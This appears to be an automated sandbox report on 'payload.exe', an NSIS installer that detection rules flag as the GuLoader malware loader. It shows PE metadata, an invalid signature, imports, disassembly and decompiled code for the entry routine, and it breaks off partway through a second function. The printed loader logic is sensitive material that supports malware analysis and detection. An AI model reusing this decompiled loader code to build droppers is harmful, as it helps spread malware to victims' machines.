DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	OU="Squawker Knockdown ", E=Eccles@Wellread.Re, O=Anglepods, L=Bubach, S=Rheinland-Pfalz, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/27/2021 1:58:17 PM 12/26/2024 1:58:17 PM
Subject Chain	OU="Squawker Knockdown ", E=Eccles@Wellread.Re, O=Anglepods, L=Bubach, S=Rheinland-Pfalz, C=DE
Version:	3
Thumbprint MD5:	9E7325B8562E52F5162C5AB785F399F4
Thumbprint SHA-1:	85545F9B108F36D0B5B347A37620848A1258466C
Thumbprint SHA-256:	02DA6DA62F237B3F328AC83FB1BF85E9FB6962AFFC371AE450F6558D69F4F62D
Serial:	22C671D30AC9B457

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007FC040C79B23h
push ebx
call 00007FC040C7CA91h
cmp eax, ebx
je 00007FC040C79B19h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FC040C7CA0Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FC040C79AFDh
push ebp
push 00000009h
call 00007FC040C7CA64h
push 00000007h
call 00007FC040C7CA5Dh
mov dword ptr [00423704h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407174h]
push 00409188h
push 00422F00h
call 00007FC040C7C687h
call dword ptr [0040709Ch]
mov ebp, 00429000h
push eax
push ebp
call 00007FC040C7C675h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0x16a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x45378	0x1ee0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c5b	0x5e00	False	0.6603640292553191	data	6.411456379497882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	False	0.6376953125	data	5.108396988130901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x17000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b000	0x16a8	0x1800	False	0.3681640625	data	4.643642871246492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x3b238	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x3b5a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States
RT_DIALOG	0x3be48	0x144	data	English	United States
RT_DIALOG	0x3bf90	0x13c	data	English	United States
RT_DIALOG	0x3c0d0	0x100	data	English	United States
RT_DIALOG	0x3c1d0	0x11c	data	English	United States
RT_DIALOG	0x3c2f0	0x60	data	English	United States
RT_GROUP_ICON	0x3c350	0x14	data	English	United States
RT_MANIFEST	0x3c368	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: payload.exePID: 1036, Parent PID: 1860

General

Target ID:	1
Start time:	17:35:13
Start date:	16/11/2022
Path:	C:\Users\user\Desktop\payload.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\payload.exe
Imagebase:	0x400000
File size:	291416 bytes
MD5 hash:	2D3C3F5D92529875803A08BA3299874F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.1416776926.0000000000621000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1416990140.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: payload.exePID: 1036, Parent PID: 1860COMMON

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.5%
Total number of Nodes:	1519
Total number of Limit Nodes:	49

Executed Functions

Function 004030D9 Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			_entry_() {
				intOrPtr _t45;
				CHAR* _t49;
				char* _t52;
				CHAR* _t54;
				void* _t58;
				intOrPtr _t60;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t185;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t118 = E00406092(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E00406024(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406092(9);
				_t45 = E00406092(7);
				 *0x423704 = _t45;
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x4237b8 = _t45;
				SHGetFileInfoA(0x41ecc8, 0, _t163 + 0x38, 0x160, 0); // executed
				E00405CF9(0x422f00, "NSIS Error");
				_t49 = GetCommandLineA();
				_t159 = "\"C:\\Users\\Albus\\Desktop\\payload.exe\"";
				E00405CF9(_t159, _t49);
				 *0x423700 = GetModuleHandleA(0);
				_t52 = _t159;
				if("\"C:\\Users\\Albus\\Desktop\\payload.exe\"" == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t52 =  &M00429001;
				}
				_t54 = CharNextA(E00405796(_t52,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t54;
				while(1) {
					_t121 =  *_t54;
					_t168 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L10:
						__eflags =  *_t54 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t54 == 0x22) {
							_t54 =  &(_t54[1]);
							__eflags = _t54;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t54 - 0x2f;
						if( *_t54 != 0x2f) {
							L22:
							_t54 = E00405796(_t54,  *(_t163 + 0x14));
							__eflags =  *_t54 - 0x22;
							if(__eflags == 0) {
								_t54 =  &(_t54[1]);
								__eflags = _t54;
							}
							continue;
						} else {
							_t54 =  &(_t54[1]);
							__eflags =  *_t54 - 0x53;
							if( *_t54 != 0x53) {
								L17:
								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L21:
									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										 *((char*)(_t54 - 2)) = 0;
										__eflags =  &(_t54[2]);
										E00405CF9("C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical",  &(_t54[2]));
										L27:
										_t156 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t58 = E004030A8(_t168);
										_t169 = _t58;
										if(_t58 != 0) {
											L30:
											DeleteFileA("1033"); // executed
											_t60 = E00402C66(_t171,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t60;
											if(_t60 != 0) {
												L40:
												E0040359F();
												__imp__OleUninitialize();
												_t181 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x423794;
													if( *0x423794 == 0) {
														L64:
														_t62 =  *0x4237ac;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406092(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L62:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L64;
														}
														goto L63;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L63:
															E0040140B(9);
															goto L64;
														}
														goto L62;
													}
												}
												E004054EF( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42371c == 0) {
												L39:
												 *0x4237ac =  *0x4237ac | 0xffffffff;
												 *(_t163 + 0x18) = E00403679( *0x4237ac);
												goto L40;
											}
											_t152 = E00405796(_t159, 0);
											if(_t152 < _t159) {
												L36:
												_t178 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E00405472(_t181);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\Albus\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\Albus\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E00405455();
														} else {
															E004053D8();
														}
														SetCurrentDirectoryA(_t156);
														_t185 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical"; // 0x43
														if(_t185 == 0) {
															E00405CF9("C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical", _t161);
														}
														E00405CF9(0x424000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x424400 = "A";
														do {
															E00405D1B(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x120)));
															DeleteFileA(0x41e8c8);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\Albus\\Desktop\\payload.exe", 0x41e8c8, 1) != 0) {
																E00405BB4(_t136, 0x41e8c8, 0);
																E00405D1B(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x124)));
																_t93 = E0040548A(0x41e8c8);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x424400 =  *0x424400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405BB4(_t136, _t156, 0);
													}
													goto L40;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405859(_t178, _t152 + 4) == 0) {
													goto L40;
												}
												E00405CF9("C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical", _t153);
												E00405CF9("C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Chipyard\\reconfiguration", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L39;
											}
											_t109 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L36;
											}
											goto L36;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E004030A8(_t169);
										_t170 = _t112;
										if(_t112 != 0) {
											goto L30;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E004030A8(_t170);
										_t171 = _t117;
										if(_t117 == 0) {
											goto L40;
										}
										goto L30;
									}
									goto L22;
								}
								_t140 = _t54[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L20:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L21;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L21;
								}
								goto L20;
							}
							_t141 = _t54[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L16:
								 *0x4237a0 = 1;
								goto L17;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L17;
							}
							goto L16;
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t54 =  &(_t54[1]);
						__eflags =  *_t54 - 0x20;
					} while ( *_t54 == 0x20);
					goto L10;
				}
				goto L27;
			}

0x004030e9
0x004030ed
0x004030f5
0x004030f9
0x004030fe
0x0040310e
0x00403111
0x00403118
0x0040311f
0x0040311f
0x00403118
0x00403121
0x00403126
0x00403127
0x00403133
0x00403137
0x0040313e
0x00403145
0x0040314a
0x0040314f
0x00403156
0x0040315c
0x00403172
0x00403182
0x00403187
0x0040318d
0x00403194
0x004031a7
0x004031ac
0x004031ae
0x004031b0
0x004031b5
0x004031b5
0x004031c5
0x004031cb
0x00403294
0x00403294
0x00403296
0x00403298
0x00000000
0x00000000
0x004031d4
0x004031d7
0x004031df
0x004031df
0x004031e2
0x004031e7
0x004031e9
0x004031e9
0x004031ea
0x004031ea
0x004031ef
0x004031f2
0x00403284
0x00403289
0x0040328e
0x00403291
0x00403293
0x00403293
0x00403293
0x00000000
0x004031f8
0x004031f8
0x004031f9
0x004031fc
0x00403214
0x0040323f
0x00403241
0x00403254
0x0040327f
0x00403282
0x004032a0
0x004032a3
0x004032ac
0x004032b1
0x004032b7
0x004032c2
0x004032c4
0x004032c9
0x004032cb
0x00403323
0x00403328
0x00403332
0x00403339
0x0040333d
0x004033d1
0x004033d1
0x004033d6
0x004033dc
0x004033e1
0x00403505
0x0040350b
0x00403587
0x00403587
0x0040358c
0x0040358f
0x00403591
0x00403591
0x00403599
0x00403599
0x0040351b
0x00403523
0x00403525
0x00403526
0x00403533
0x00403546
0x0040354e
0x00403552
0x00403552
0x0040355a
0x0040355f
0x00403566
0x00403574
0x00403576
0x0040357c
0x0040357e
0x00000000
0x00000000
0x00000000
0x00403568
0x0040356e
0x00403570
0x00403572
0x00403580
0x00403582
0x00000000
0x00403582
0x00000000
0x00403572
0x00403566
0x004033f0
0x004033f7
0x004033f7
0x00403349
0x004033c1
0x004033c1
0x004033cd
0x00000000
0x004033cd
0x00403352
0x00403356
0x0040338c
0x0040338c
0x0040338e
0x00403396
0x00403408
0x0040340a
0x00403411
0x00403419
0x00403419
0x00403424
0x00403429
0x00403438
0x0040343c
0x0040343d
0x00403446
0x0040343f
0x0040343f
0x0040343f
0x0040344c
0x00403452
0x00403458
0x00403460
0x00403460
0x0040346e
0x00403473
0x00403485
0x0040348d
0x00403493
0x0040349f
0x004034a5
0x004034af
0x004034c5
0x004034d6
0x004034dc
0x004034e3
0x004034e6
0x004034ec
0x004034ec
0x004034e3
0x004034f0
0x004034f6
0x004034f6
0x004034fb
0x004034fb
0x00000000
0x00403438
0x00403398
0x0040339a
0x004033a5
0x00000000
0x00000000
0x004033ad
0x004033b8
0x004033bd
0x00000000
0x004033bd
0x00403381
0x00403383
0x00403387
0x0040338a
0x00000000
0x00000000
0x00000000
0x0040338a
0x00000000
0x00403383
0x004032d3
0x004032df
0x004032e4
0x004032e9
0x004032eb
0x00000000
0x00000000
0x004032f3
0x004032fb
0x0040330c
0x00403314
0x00403316
0x0040331b
0x0040331d
0x00000000
0x00000000
0x00000000
0x0040331d
0x00000000
0x00403282
0x00403243
0x00403246
0x00403249
0x0040324f
0x0040324f
0x0040324f
0x0040324f
0x00000000
0x0040324f
0x0040324b
0x0040324d
0x00000000
0x00000000
0x00000000
0x0040324d
0x004031fe
0x00403201
0x00403204
0x0040320a
0x0040320a
0x00000000
0x0040320a
0x00403206
0x00403208
0x00000000
0x00000000
0x00000000
0x00403208
0x00000000
0x00000000
0x00000000
0x004031d9
0x004031d9
0x004031d9
0x004031da
0x004031da
0x00000000
0x004031d9
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 004030FE
GetVersion.KERNEL32 ref: 00403104
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040312D
#17.COMCTL32(00000007,00000009), ref: 0040314F
OleInitialize.OLE32(00000000), ref: 00403156
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000), ref: 00403172
GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403187
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\payload.exe",00000000), ref: 0040319A
CharNextA.USER32(00000000), ref: 004031C5
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004032C2
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032DF
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004032F3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FB
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330C
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403314
DeleteFileA.KERNELBASE(1033), ref: 00403328

Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?,?,?,00403143,00000009), ref: 004060BF

OleUninitialize.OLE32 ref: 004033D6
ExitProcess.KERNEL32 ref: 004033F7
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403514
OpenProcessToken.ADVAPI32(00000000), ref: 0040351B
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403533
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403552
ExitWindowsEx.USER32(00000002,80040002), ref: 00403576
ExitProcess.KERNEL32 ref: 00403599

Part of subcall function 004054EF: MessageBoxIndirectA.USER32 ref: 0040554A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004032B7, 004032BC, 004032D2, 004032DE, 004032ED, 004032FA, 00403306, 0040330E, 00403407, 00403418, 00403423, 0040342F, 0040343C, 0040344B, 004034FA
\Temp, xrefs: 004032D9
TEMP, xrefs: 00403307
SeShutdownPrivilege, xrefs: 0040352D
"C:\Users\user\Desktop\payload.exe", xrefs: 0040318D, 00403193, 0040334C
C:\Users\user\Desktop, xrefs: 00403429, 0040342E, 0040345A
", xrefs: 004031EA
TMP, xrefs: 0040330F
C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration, xrefs: 004033B3
1033, xrefs: 00403323
.tmp, xrefs: 0040341E
NSIS Error, xrefs: 00403178
Low, xrefs: 004032F5
C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical, xrefs: 004032A7, 004033A8, 00403452, 0040345B
UXTHEME, xrefs: 00403121, 00403126, 0040312C
C:\Users\user\Desktop\payload.exe, xrefs: 004034B4
~nsu, xrefs: 00403402
Error launching installer, xrefs: 0040338E

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\payload.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration$C:\Users\user\Desktop$C:\Users\user\Desktop\payload.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3329125770-2113824864
Opcode ID: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
Instruction ID: e7c85c4fe1f62676e3f8a08d8ca43f8bf3783ba147aef7bb7f1979754dcbcc24
Opcode Fuzzy Hash: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
Instruction Fuzzy Hash: B7C1E5706083417AE711AF71AD8DA2B7EA8EB85306F04457FF541B61D2C77C5A05CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040488F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040488F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
